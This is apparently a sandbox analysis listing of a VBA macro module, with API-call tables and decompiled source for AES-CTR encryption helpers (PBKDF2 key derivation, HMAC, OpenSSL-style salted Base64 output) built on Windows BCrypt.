    AesCryptArrayAPIs: 119, Strings: 0, Number of lines: 70, Relevance: 148.82

    APIsMeta Information

    IsArray

    IsMissing

    vbNullString

    IsArray

    Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

    Part of subcall function ToUtf8Array@Module3: CP_UTF8

    Part of subcall function ToUtf8Array@Module3: StrPtr

    Part of subcall function ToUtf8Array@Module3: Len

    Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

    Part of subcall function ToUtf8Array@Module3: CP_UTF8

    Part of subcall function ToUtf8Array@Module3: StrPtr

    Part of subcall function ToUtf8Array@Module3: Len

    Part of subcall function ToUtf8Array@Module3: vbNullString

    vbNullString

    IsMissing

    IsArray

    Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

    Part of subcall function ToUtf8Array@Module3: CP_UTF8

    Part of subcall function ToUtf8Array@Module3: StrPtr

    Part of subcall function ToUtf8Array@Module3: Len

    Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

    Part of subcall function ToUtf8Array@Module3: CP_UTF8

    Part of subcall function ToUtf8Array@Module3: StrPtr

    Part of subcall function ToUtf8Array@Module3: Len

    Part of subcall function ToUtf8Array@Module3: vbNullString

    vbNullString

    IsArray

    AES_KEYLEN

    Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString

    Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString

    Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

    Part of subcall function pvCryptoAesCtrInit@Module3: UBound

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

    Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: KDF_HASH

    Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

    Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptDeriveKeyPBKDF2

    Part of subcall function pvCryptoAesCtrInit@Module3: pvArrayPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: pvArraySize

    Part of subcall function pvCryptoAesCtrInit@Module3: KDF_ITER

    Part of subcall function pvCryptoAesCtrInit@Module3: UBound

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

    Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty

    Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptSetProperty

    Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGenerateSymmetricKey

    Part of subcall function pvCryptoAesCtrInit@Module3: CopyMemory

    Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

    Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: HMAC_HASH

    Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

    Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty

    Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptCreateHash

    Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

    Part of subcall function pvCryptoAesCtrInit@Module3: LastError

    Part of subcall function pvCryptoAesCtrInit@Module3: LastError

    Part of subcall function pvCryptoAesCtrInit@Module3: ERR_UNSUPPORTED_ENCR

    LastError

    Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArraySize

    Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData

    Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr

    Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

    Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

    Part of subcall function pvCryptoAesCtrCrypt@Module3: UBound

    Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

    Part of subcall function pvCryptoAesCtrCrypt@Module3: CopyMemory

    Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

    Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptEncrypt

    Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData

    Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr

    Part of subcall function pvCryptoAesCtrCrypt@Module3: LastError

    LastError

    IsArray

    Part of subcall function pvCryptoGetFinalHash@Module3: HashLen

    Part of subcall function pvCryptoGetFinalHash@Module3: BCryptFinishHash

    Part of subcall function pvCryptoGetFinalHash@Module3: hHmacHash

    Part of subcall function pvCryptoGetFinalHash@Module3: HashLen

    UBound

    Part of subcall function PeekPtr@Module3: CopyMemory

    Part of subcall function PeekPtr@Module3: PTR_SIZE

    VarPtr

    Part of subcall function PeekPtr@Module3: CopyMemory

    Part of subcall function PeekPtr@Module3: PTR_SIZE

    VarPtr

    Part of subcall function PeekPtr@Module3: CopyMemory

    Part of subcall function PeekPtr@Module3: PTR_SIZE

    VarPtr

    VT_BYREF

    Part of subcall function PeekPtr@Module3: CopyMemory

    Part of subcall function PeekPtr@Module3: PTR_SIZE

    Part of subcall function PeekPtr@Module3: CopyMemory

    Part of subcall function PeekPtr@Module3: PTR_SIZE

    Part of subcall function PeekPtr@Module3: CopyMemory

    Part of subcall function PeekPtr@Module3: PTR_SIZE

    CopyMemory

    UBound

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

    Array

    Number

    Err

    Source

    Description

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

    Raise

    LineInstructionMeta Information
    186

    Public Function AesCryptArray(baData() as Byte, optional Password as Variant, optional Salt as Variant, optional key as Variant, optional ByVal KeyLen as Long, optional Error as String, optional Hmac as Variant) as Boolean

    194

    Const VT_BYREF as Long = &H4000

    195

    Dim uCtx as UcsCryptoContextType

    196

    Dim vErr as Variant

    197

    Dim bHashBefore as Boolean

    198

    Dim bHashAfter as Boolean

    199

    Dim baPass() as Byte

    200

    Dim baSalt() as Byte

    201

    Dim baKey() as Byte

    202

    Dim baTemp() as Byte

    203

    Dim lPtr as LongPtr

    205

    On Error Goto EH

    206

    If IsArray(Hmac) Then

    IsArray

    207

    bHashBefore = (Hmac(0) <= 0)

    208

    bHashAfter = (Hmac(0) > 0)

    209

    Endif

    210

    If IsMissing(Password) Then

    IsMissing

    211

    baPass = vbNullString

    vbNullString

    212

    Elseif IsArray(Password) Then

    IsArray

    213

    baPass = Password

    214

    Else

    215

    baPass = ToUtf8Array(Password & vbNullString)

    vbNullString

    216

    Endif

    217

    If IsMissing(Salt) Then

    IsMissing

    218

    baSalt = baPass

    219

    Elseif IsArray(Salt) Then

    IsArray

    220

    baSalt = Salt

    221

    Else

    222

    baSalt = ToUtf8Array(Salt & vbNullString)

    vbNullString

    223

    Endif

    224

    If IsArray(key) Then

    IsArray

    225

    baKey = key

    226

    Endif

    227

    If KeyLen <= 0 Then

    228

    KeyLen = AES_KEYLEN

    AES_KEYLEN

    229

    Endif

    230

    If Not pvCryptoAesCtrInit(uCtx, baPass, baSalt, baKey, KeyLen) Then

    231

    Error = uCtx.LastError

    LastError

    232

    Goto QH

    233

    Endif

    234

    If Not pvCryptoAesCtrCrypt(uCtx, baData, HashBefore := bHashBefore, HashAfter := bHashAfter) Then

    235

    Error = uCtx.LastError

    LastError

    236

    Goto QH

    237

    Endif

    238

    If IsArray(Hmac) Then

    IsArray

    239

    baTemp = pvCryptoGetFinalHash(uCtx, UBound(Hmac) + 1)

    UBound

    240

    #if Win64 then

    241

    lPtr = PeekPtr(VarPtr(Hmac) + 8)

    VarPtr

    242

    #else

    243

    lPtr = PeekPtr((VarPtr(Hmac) Xor &H80000000) + 8 Xor &H80000000)

    VarPtr

    244

    #endif

    245

    If (PeekPtr(VarPtr(Hmac)) And VT_BYREF) <> 0 Then

    VarPtr

    VT_BYREF

    246

    lPtr = PeekPtr(lPtr)

    247

    Endif

    248

    #if Win64 then

    249

    lPtr = PeekPtr(lPtr + 16)

    250

    #else

    251

    lPtr = PeekPtr((lPtr Xor &H80000000) + 12 Xor &H80000000)

    252

    #endif

    253

    Call CopyMemory(ByVal lPtr, baTemp(0), UBound(baTemp) + 1)

    CopyMemory

    UBound

    254

    Endif

    256

    AesCryptArray = True

    256

    QH:

    258

    pvCryptoAesCtrTerminate uCtx

    259

    Exit Function

    259

    EH:

    261

    vErr = Array(Err.Number, Err.Source, Err.Description)

    Array

    Number

    Err

    Source

    Description

    262

    pvCryptoAesCtrTerminate uCtx

    263

    Err.Raise vErr(0), vErr(1), vErr(2)

    Raise

    264

    End Function

    Function

    AesEncryptStringAPIs: 83, Strings: 0, Number of lines: 32, Relevance: 103.782

    APIsMeta Information

    OPENSSL_MAGICLEN

    KDF_SALTLEN

    Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

    Part of subcall function ToUtf8Array@Module3: CP_UTF8

    Part of subcall function ToUtf8Array@Module3: StrPtr

    Part of subcall function ToUtf8Array@Module3: Len

    Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

    Part of subcall function ToUtf8Array@Module3: CP_UTF8

    Part of subcall function ToUtf8Array@Module3: StrPtr

    Part of subcall function ToUtf8Array@Module3: Len

    Part of subcall function ToUtf8Array@Module3: vbNullString

    vbNullString

    vbNullString

    IsArray

    IsMissing

    Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

    Part of subcall function ToUtf8Array@Module3: CP_UTF8

    Part of subcall function ToUtf8Array@Module3: StrPtr

    Part of subcall function ToUtf8Array@Module3: Len

    Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

    Part of subcall function ToUtf8Array@Module3: CP_UTF8

    Part of subcall function ToUtf8Array@Module3: StrPtr

    Part of subcall function ToUtf8Array@Module3: Len

    Part of subcall function ToUtf8Array@Module3: vbNullString

    vbNullString

    KDF_SALTLEN

    RtlGenRandom

    KDF_SALTLEN

    Part of subcall function AesCryptArray@Module3: IsArray

    Part of subcall function AesCryptArray@Module3: IsMissing

    Part of subcall function AesCryptArray@Module3: vbNullString

    Part of subcall function AesCryptArray@Module3: IsArray

    Part of subcall function AesCryptArray@Module3: vbNullString

    Part of subcall function AesCryptArray@Module3: IsMissing

    Part of subcall function AesCryptArray@Module3: IsArray

    Part of subcall function AesCryptArray@Module3: vbNullString

    Part of subcall function AesCryptArray@Module3: IsArray

    Part of subcall function AesCryptArray@Module3: AES_KEYLEN

    Part of subcall function AesCryptArray@Module3: LastError

    Part of subcall function AesCryptArray@Module3: LastError

    Part of subcall function AesCryptArray@Module3: IsArray

    Part of subcall function AesCryptArray@Module3: UBound

    Part of subcall function AesCryptArray@Module3: VarPtr

    Part of subcall function AesCryptArray@Module3: VarPtr

    Part of subcall function AesCryptArray@Module3: VarPtr

    Part of subcall function AesCryptArray@Module3: VT_BYREF

    Part of subcall function AesCryptArray@Module3: CopyMemory

    Part of subcall function AesCryptArray@Module3: UBound

    Part of subcall function AesCryptArray@Module3: Array

    Part of subcall function AesCryptArray@Module3: Number

    Part of subcall function AesCryptArray@Module3: Err

    Part of subcall function AesCryptArray@Module3: Source

    Part of subcall function AesCryptArray@Module3: Description

    Part of subcall function AesCryptArray@Module3: Raise

    Raise

    vbObjectError

    IsArray

    UBound

    PREFIXLEN

    UBound

    PREFIXLEN

    CopyMemory

    PREFIXLEN

    UBound

    CopyMemory

    OPENSSL_MAGICLEN

    KDF_SALTLEN

    CopyMemory

    OPENSSL_MAGIC

    OPENSSL_MAGICLEN

    Replace

    Part of subcall function ToBase64Array@Module3: UBound

    Part of subcall function ToBase64Array@Module3: String$

    Part of subcall function ToBase64Array@Module3: UBound

    Part of subcall function ToBase64Array@Module3: Len

    Part of subcall function ToBase64Array@Module3: CryptBinaryToString

    Part of subcall function ToBase64Array@Module3: VarPtr

    Part of subcall function ToBase64Array@Module3: UBound

    Part of subcall function ToBase64Array@Module3: CRYPT_STRING_BASE64

    Part of subcall function ToBase64Array@Module3: StrPtr

    Part of subcall function ToBase64Array@Module3: Left$

    vbCrLf

    vbNullString

    LineInstructionMeta Information
    112

    Public Function AesEncryptString(sText as String, optional Password as Variant) as String

    113

    Const PREFIXLEN as Long = OPENSSL_MAGICLEN + KDF_SALTLEN

    OPENSSL_MAGICLEN

    KDF_SALTLEN

    114

    Dim baData() as Byte

    115

    Dim baPass() as Byte

    116

    Dim baSalt() as Byte

    117

    Dim baKey() as Byte

    118

    Dim sError as String

    120

    baData = ToUtf8Array(sText)

    121

    baPass = vbNullString

    vbNullString

    122

    baSalt = vbNullString

    vbNullString

    123

    If Not IsArray(Password) Then

    IsArray

    124

    If Not IsMissing(Password) Then

    IsMissing

    125

    baPass = ToUtf8Array(Password & vbNullString)

    vbNullString

    126

    Endif

    127

    Redim baSalt(0 To KDF_SALTLEN - 1)

    KDF_SALTLEN

    128

    Call RtlGenRandom(baSalt(0), KDF_SALTLEN)

    RtlGenRandom

    KDF_SALTLEN

    129

    Else

    130

    baKey = Password

    131

    Endif

    132

    If Not AesCryptArray(baData, baPass, baSalt, baKey, Error := sError) Then

    133

    Err.Raise vbObjectError, , sError

    Raise

    vbObjectError

    134

    Endif

    135

    If Not IsArray(Password) Then

    IsArray

    136

    Redim Preserve baData(0 To UBound(baData) + PREFIXLEN)

    UBound

    PREFIXLEN

    137

    If UBound(baData) >= PREFIXLEN Then

    UBound

    PREFIXLEN

    138

    Call CopyMemory(baData(PREFIXLEN), baData(0), UBound(baData) + 1 - PREFIXLEN)

    CopyMemory

    PREFIXLEN

    UBound

    139

    Endif

    140

    Call CopyMemory(baData(OPENSSL_MAGICLEN), baSalt(0), KDF_SALTLEN)

    CopyMemory

    OPENSSL_MAGICLEN

    KDF_SALTLEN

    141

    Call CopyMemory(baData(0), ByVal OPENSSL_MAGIC, OPENSSL_MAGICLEN)

    CopyMemory

    OPENSSL_MAGIC

    OPENSSL_MAGICLEN

    142

    Endif

    143

    AesEncryptString = Replace(ToBase64Array(baData), vbCrLf, vbNullString)

    Replace

    vbCrLf

    vbNullString

    144

    End Function

    Function

    AesDecryptStringAPIs: 79, Strings: 0, Number of lines: 37, Relevance: 98.787

    APIsMeta Information

    OPENSSL_MAGICLEN

    KDF_SALTLEN

    Part of subcall function FromBase64Array@Module3: Len

    Part of subcall function FromBase64Array@Module3: CryptStringToBinary

    Part of subcall function FromBase64Array@Module3: StrPtr

    Part of subcall function FromBase64Array@Module3: Len

    Part of subcall function FromBase64Array@Module3: CRYPT_STRING_BASE64

    Part of subcall function FromBase64Array@Module3: VarPtr

    Part of subcall function FromBase64Array@Module3: vbNullString

    vbNullString

    vbNullString

    IsArray

    IsMissing

    Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

    Part of subcall function ToUtf8Array@Module3: CP_UTF8

    Part of subcall function ToUtf8Array@Module3: StrPtr

    Part of subcall function ToUtf8Array@Module3: Len

    Part of subcall function ToUtf8Array@Module3: WideCharToMultiByte

    Part of subcall function ToUtf8Array@Module3: CP_UTF8

    Part of subcall function ToUtf8Array@Module3: StrPtr

    Part of subcall function ToUtf8Array@Module3: Len

    Part of subcall function ToUtf8Array@Module3: vbNullString

    vbNullString

    UBound

    PREFIXLEN

    String$

    OPENSSL_MAGICLEN

    CopyMemory

    OPENSSL_MAGICLEN

    OPENSSL_MAGIC

    KDF_SALTLEN

    CopyMemory

    OPENSSL_MAGICLEN

    KDF_SALTLEN

    UBound

    PREFIXLEN

    CopyMemory

    PREFIXLEN

    UBound

    UBound

    PREFIXLEN

    vbNullString

    Part of subcall function AesCryptArray@Module3: IsArray

    Part of subcall function AesCryptArray@Module3: IsMissing

    Part of subcall function AesCryptArray@Module3: vbNullString

    Part of subcall function AesCryptArray@Module3: IsArray

    Part of subcall function AesCryptArray@Module3: vbNullString

    Part of subcall function AesCryptArray@Module3: IsMissing

    Part of subcall function AesCryptArray@Module3: IsArray

    Part of subcall function AesCryptArray@Module3: vbNullString

    Part of subcall function AesCryptArray@Module3: IsArray

    Part of subcall function AesCryptArray@Module3: AES_KEYLEN

    Part of subcall function AesCryptArray@Module3: LastError

    Part of subcall function AesCryptArray@Module3: LastError

    Part of subcall function AesCryptArray@Module3: IsArray

    Part of subcall function AesCryptArray@Module3: UBound

    Part of subcall function AesCryptArray@Module3: VarPtr

    Part of subcall function AesCryptArray@Module3: VarPtr

    Part of subcall function AesCryptArray@Module3: VarPtr

    Part of subcall function AesCryptArray@Module3: VT_BYREF

    Part of subcall function AesCryptArray@Module3: CopyMemory

    Part of subcall function AesCryptArray@Module3: UBound

    Part of subcall function AesCryptArray@Module3: Array

    Part of subcall function AesCryptArray@Module3: Number

    Part of subcall function AesCryptArray@Module3: Err

    Part of subcall function AesCryptArray@Module3: Source

    Part of subcall function AesCryptArray@Module3: Description

    Part of subcall function AesCryptArray@Module3: Raise

    Raise

    vbObjectError

    Part of subcall function FromUtf8Array@Module3: UBound

    Part of subcall function FromUtf8Array@Module3: String$

    Part of subcall function FromUtf8Array@Module3: UBound

    Part of subcall function FromUtf8Array@Module3: MultiByteToWideChar

    Part of subcall function FromUtf8Array@Module3: CP_UTF8

    Part of subcall function FromUtf8Array@Module3: UBound

    Part of subcall function FromUtf8Array@Module3: StrPtr

    Part of subcall function FromUtf8Array@Module3: Len

    Part of subcall function FromUtf8Array@Module3: Left$

    LineInstructionMeta Information
    147

    Public Function AesDecryptString(sEncr as String, optional Password as Variant) as String

    148

    Const PREFIXLEN as Long = OPENSSL_MAGICLEN + KDF_SALTLEN

    OPENSSL_MAGICLEN

    KDF_SALTLEN

    149

    Dim baData() as Byte

    150

    Dim baPass() as Byte

    151

    Dim baSalt() as Byte

    152

    Dim baKey() as Byte

    153

    Dim sMagic as String

    154

    Dim sError as String

    156

    baData = FromBase64Array(sEncr)

    157

    baPass = vbNullString

    vbNullString

    158

    baSalt = vbNullString

    vbNullString

    159

    If Not IsArray(Password) Then

    IsArray

    160

    If Not IsMissing(Password) Then

    IsMissing

    161

    baPass = ToUtf8Array(Password & vbNullString)

    vbNullString

    162

    Endif

    163

    If UBound(baData) >= PREFIXLEN - 1 Then

    UBound

    PREFIXLEN

    164

    sMagic = String$(OPENSSL_MAGICLEN, 0)

    String$

    OPENSSL_MAGICLEN

    165

    Call CopyMemory(ByVal sMagic, baData(0), OPENSSL_MAGICLEN)

    CopyMemory

    OPENSSL_MAGICLEN

    166

    If sMagic = OPENSSL_MAGIC Then

    OPENSSL_MAGIC

    167

    Redim baSalt(0 To KDF_SALTLEN - 1)

    KDF_SALTLEN

    168

    Call CopyMemory(baSalt(0), baData(OPENSSL_MAGICLEN), KDF_SALTLEN)

    CopyMemory

    OPENSSL_MAGICLEN

    KDF_SALTLEN

    169

    If UBound(baData) >= PREFIXLEN Then

    UBound

    PREFIXLEN

    170

    Call CopyMemory(baData(0), baData(PREFIXLEN), UBound(baData) + 1 - PREFIXLEN)

    CopyMemory

    PREFIXLEN

    UBound

    171

    Redim Preserve baData(0 To UBound(baData) - PREFIXLEN)

    UBound

    PREFIXLEN

    172

    Else

    173

    baData = vbNullString

    vbNullString

    174

    Endif

    175

    Endif

    176

    Endif

    177

    Else

    178

    baKey = Password

    179

    Endif

    180

    If Not AesCryptArray(baData, baPass, baSalt, baKey, Error := sError) Then

    181

    Err.Raise vbObjectError, , sError

    Raise

    vbObjectError

    182

    Endif

    183

    AesDecryptString = FromUtf8Array(baData)

    184

    End Function

    Function

    AesChunkedInitAPIs: 46, Strings: 0, Number of lines: 13, Relevance: 57.513

    APIsMeta Information

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyHash

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptDestroyKey

    Part of subcall function pvCryptoAesCtrTerminate@Module3: BCryptCloseAlgorithmProvider

    m_uChunkedCtx

    vbNullString

    IsArray

    AES_KEYLEN

    Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString

    Part of subcall function pvCryptoAesCtrInit@Module3: vbNullString

    Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

    Part of subcall function pvCryptoAesCtrInit@Module3: UBound

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

    Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: KDF_HASH

    Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

    Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptDeriveKeyPBKDF2

    Part of subcall function pvCryptoAesCtrInit@Module3: pvArrayPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: pvArraySize

    Part of subcall function pvCryptoAesCtrInit@Module3: KDF_ITER

    Part of subcall function pvCryptoAesCtrInit@Module3: UBound

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

    Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty

    Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptSetProperty

    Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGenerateSymmetricKey

    Part of subcall function pvCryptoAesCtrInit@Module3: CopyMemory

    Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptOpenAlgorithmProvider

    Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: HMAC_HASH

    Part of subcall function pvCryptoAesCtrInit@Module3: MS_PRIMITIVE_PROVIDER

    Part of subcall function pvCryptoAesCtrInit@Module3: BCRYPT_ALG_HANDLE_HMAC_FLAG

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptGetProperty

    Part of subcall function pvCryptoAesCtrInit@Module3: StrPtr

    Part of subcall function pvCryptoAesCtrInit@Module3: BCryptCreateHash

    Part of subcall function pvCryptoAesCtrInit@Module3: AES_IVLEN

    Part of subcall function pvCryptoAesCtrInit@Module3: LastError

    Part of subcall function pvCryptoAesCtrInit@Module3: LastError

    Part of subcall function pvCryptoAesCtrInit@Module3: ERR_UNSUPPORTED_ENCR

    m_uChunkedCtx

    LineInstructionMeta Information
    266

    Public Function AesChunkedInit(optional key as Variant, optional ByVal KeyLen as Long) as Boolean

    267

    Dim baEmpty() as Byte

    268

    Dim baKey() as Byte

    270

    pvCryptoAesCtrTerminate m_uChunkedCtx

    m_uChunkedCtx

    271

    baEmpty = vbNullString

    vbNullString

    272

    If IsArray(key) Then

    IsArray

    273

    baKey = key

    274

    Endif

    275

    If KeyLen <= 0 Then

    276

    KeyLen = AES_KEYLEN

    AES_KEYLEN

    277

    Endif

    278

    AesChunkedInit = pvCryptoAesCtrInit(m_uChunkedCtx, baEmpty, baEmpty, baKey, KeyLen)

    m_uChunkedCtx

    279

    End Function

    Function

    pvCryptoAesCtrCryptAPIs: 30, Strings: 0, Number of lines: 59, Relevance: 37.559

    APIsMeta Information

    pvArraySize

    BCryptHashData

    pvArrayPtr

    AES_BLOCK_SIZE

    AES_BLOCK_SIZE

    UBound

    AES_BLOCK_SIZE

    CopyMemory

    AES_BLOCK_SIZE

    Part of subcall function pvInc@Module3: htonl

    Part of subcall function pvInc@Module3: htonl

    Part of subcall function pvInc@Module3: htonl

    Part of subcall function pvInc@Module3: htonl

    Part of subcall function pvInc@Module3: htonl

    Part of subcall function pvInc@Module3: htonl

    Part of subcall function pvInc@Module3: htonl

    Part of subcall function pvInc@Module3: htonl

    BCryptEncrypt

    BCryptHashData

    pvArrayPtr

    LastError

    Part of subcall function GetSystemMessage@Module3: Space$

    Part of subcall function GetSystemMessage@Module3: FormatMessage

    Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_FROM_SYSTEM

    Part of subcall function GetSystemMessage@Module3: FORMAT_MESSAGE_IGNORE_INSERTS

    Part of subcall function GetSystemMessage@Module3: Len

    Part of subcall function GetSystemMessage@Module3: Mid$

    Part of subcall function GetSystemMessage@Module3: vbCrLf

    Part of subcall function GetSystemMessage@Module3: Left$

    Part of subcall function GetSystemMessage@Module3: Hex

    LineInstructionMeta Information
    395

    Private Function pvCryptoAesCtrCrypt(uCtx as UcsCryptoContextType, baData() as Byte, optional ByVal Offset as Long, optional ByVal Size as Long = - 1, optional ByVal HashBefore as Boolean, optional ByVal HashAfter as Boolean) as Boolean

    402

    Dim lIdx as Long

    403

    Dim lJdx as Long

    404

    Dim lPadSize as Long

    405

    Dim hResult as Long

    407

    With uCtx

    408

    If Size < 0 Then

    409

    Size = pvArraySize(baData) - Offset

    pvArraySize

    410

    Endif

    411

    If HashBefore Then

    412

    hResult = BCryptHashData(. hHmacHash, ByVal pvArrayPtr(baData, Offset), Size, 0)

    BCryptHashData

    pvArrayPtr

    413

    If hResult < 0 Then

    414

    Goto QH

    415

    Endif

    416

    Endif

    418

    For lIdx = Offset To Offset + Size - 1

    419

    If (. EncrPos And (AES_BLOCK_SIZE - 1)) = 0 Then

    AES_BLOCK_SIZE

    420

    Exit For

    421

    Endif

    422

    baData(lIdx) = baData(lIdx) Xor . EncrData(. EncrPos)

    423

    . EncrPos = . EncrPos + 1

    424

    Next

    425

    If lIdx < Offset + Size Then

    427

    lPadSize = (Offset + Size - lIdx + AES_BLOCK_SIZE - 1) And - AES_BLOCK_SIZE

    AES_BLOCK_SIZE

    428

    If UBound(. EncrData) + 1 < lPadSize Then

    UBound

    429

    ReDim .EncrData(0 To lPadSize - 1) As Byte ' BAD !

    430

    Endif

    432

    For lJdx = 0 To lPadSize - 1 Step AES_BLOCK_SIZE

    AES_BLOCK_SIZE

    433

    Call CopyMemory(. EncrData(lJdx), . Nonce(0), AES_BLOCK_SIZE)

    CopyMemory

    AES_BLOCK_SIZE

    434

    If pvInc(. Nonce(3)) Then

    435

    If pvInc(. Nonce(2)) Then

    436

    If pvInc(. Nonce(1)) Then

    437

    If pvInc(. Nonce(0)) Then

    439

    Endif

    440

    Endif

    441

    Endif

    442

    Endif

    443

    Next

    AES_BLOCK_SIZE

    444

    hResult = BCryptEncrypt(. hAesKey, . EncrData(0), lPadSize, 0, 0, 0, . EncrData(0), lPadSize, lJdx, 0)

    BCryptEncrypt

    445

    If hResult < 0 Then

    446

    Goto QH

    447

    Endif

    449

    For . EncrPos = 0 To Offset + Size - lIdx - 1

    450

    baData(lIdx) = baData(lIdx) Xor . EncrData(. EncrPos)

    451

    lIdx = lIdx + 1

    452

    Next

    453

    Endif

    454

    If HashAfter Then

    455

    hResult = BCryptHashData(. hHmacHash, ByVal pvArrayPtr(baData, Offset), Size, 0)

    BCryptHashData

    pvArrayPtr

    456

    If hResult < 0 Then

    457

    Goto QH

    458

    Endif

    459

    Endif

    460

    End With

    462

    pvCryptoAesCtrCrypt = True

    463

    Exit Function

    463

    QH:

    465

    uCtx.LastError = GetSystemMessage(hResult)

    LastError

    466

    End Function

    Function

    AesChunkedCryptArrayAPIs: 21, Strings: 0, Number of lines: 11, Relevance: 26.261

    APIsMeta Information

    hAesAlg

    LastError

    ERR_CHUNKED_NOT_INIT

    Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArraySize

    Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData

    Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr

    Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

    Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

    Part of subcall function pvCryptoAesCtrCrypt@Module3: UBound

    Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

    Part of subcall function pvCryptoAesCtrCrypt@Module3: CopyMemory

    Part of subcall function pvCryptoAesCtrCrypt@Module3: AES_BLOCK_SIZE

    Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptEncrypt

    Part of subcall function pvCryptoAesCtrCrypt@Module3: BCryptHashData

    Part of subcall function pvCryptoAesCtrCrypt@Module3: pvArrayPtr

    Part of subcall function pvCryptoAesCtrCrypt@Module3: LastError

